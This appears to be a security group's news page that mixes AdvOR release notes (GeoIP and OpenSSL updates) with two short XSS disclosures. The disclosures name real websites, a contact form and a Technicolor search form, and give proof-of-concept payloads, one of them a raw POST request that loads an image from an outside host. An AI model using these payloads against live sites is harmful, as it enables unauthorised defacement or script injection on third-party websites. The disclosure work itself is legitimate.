Secure Application - XSS
Vulnerable page: http://www.secureapplication.org/contact-us.phpPoC
"><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>
It is enough to insert any XSS code directly into contact form fields and your code will be executed and displayed immediately.
Note: This is a proof of concept and it doesn't reflect the views or interests of above website.
AdvOR 0.3.0.24
Another GeoIP update.Changes in 0.3.0.24
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 123310 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries
File information: AdvOR 0.3.0.24
Another NMDC exploit fix: ApexDC++ 1.6.2

Finally, after a couple of years, ApexDC++ developers have fixed the NMDC search exploit that I was speaking about earlier. Everyone should update to latest version 1.6.2. Now I also can say that only StrongDC++ is left of all the popular clients.
AdvOR 0.3.0.23
Due to new OpenSSL vulnerabilities the library was updated to latest version 1.0.2h.Changes in 0.3.0.23
- the OpenSSL library was updated to openssl-1.0.2h- geoip_c.h was updated with GeoIPCountryWhois.csv released on May 3'rd; there are 121733 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries
File information: AdvOR 0.3.0.23
Technicolor.com search form XSS bug
Vulnerable page: http://www.technicolor.com/search/In order to reproduce the bug, you have to replace any forward slash / with backslash \ because forward slash is being URL encoded.
PoC
POST /search/ HTTP/1.1Host: www.technicolor.com
search_block_form=<img src=http:\\te-home.net\gallery\xssd_by_teamelite.png>
You can either include any XSS code in search input box, or request any XSS code directly using POST method and search_block_form parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
News
Work
Network
Forum
Gallery
Hublist
Tools
Statistics
About
Login

